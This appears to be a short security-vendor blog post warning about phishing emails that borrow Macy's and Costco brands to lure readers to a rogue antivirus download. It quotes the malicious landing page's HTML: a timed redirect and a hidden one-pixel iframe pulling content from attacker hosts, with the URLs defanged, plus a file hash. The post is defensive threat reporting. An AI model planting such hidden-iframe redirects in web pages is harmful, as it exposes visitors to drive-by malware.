MX Lab intercepted emails that leads to the rogue anti virus software with the executable antivurs_24.exe. The senders make use of well known brand names like Macy’s, Costco Photo Center and perhaps also other brands as well.
The URLs inside the message lead to a web site that hosts a malicious script and will offer you the option to download antivirus_24.exe later on.
When following this URL on our Mac we got the message “PLEASE WAITING 4 SECOND…”.
The web site has the following HTML code:
PLEASE WAITING 4 SECOND... <meta http-equiv="refresh" content="4; url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24"></head><body> <iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10" style="visibility: hidden;" height="1" width="1"></iframe> </body></html>
We got the following screen below but I’m sure that on Windows it will be slightly different. Some Windows icons will be included of your hard drives and so on.
You will get to see some errors, your system is infected and the instructions lead you to download the malware. This part is obviously fake so please do not continue the process.
Virus Total permlink and MD5: 5be4b708a68687cb5490fe2caea49c82